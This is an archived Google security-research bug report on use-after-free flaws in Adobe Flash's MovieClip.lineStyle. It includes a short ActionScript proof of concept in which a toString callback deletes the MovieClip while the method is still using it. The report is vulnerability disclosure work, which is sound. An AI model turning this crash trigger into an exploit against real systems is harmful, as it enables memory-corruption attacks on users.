search

cipherpunk / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-frees in MovieClip.lineStyle #558

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
There are a number of use-after-frees in MovieClip.lineStyle. If any of the 
String parameters are an object with toString defined, the toString method can 
delete the MovieClip, which is subsequently used. A PoC is as follows:

this.createEmptyMovieClip("triangle_mc", this.getNextHighestDepth());
var o = {toString: func};
triangle_mc.lineStyle(5, 0xff00ff, 100, true, o, "round", "miter", 1);

function func(){

    triangle_mc.removeMovieClip();
    return "none";

    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 7 Oct 2015 at 10:34

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 8 Oct 2015 at 10:24

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 6 Nov 2015 at 7:05

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 17 Dec 2015 at 7:20

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 17 Dec 2015 at 7:21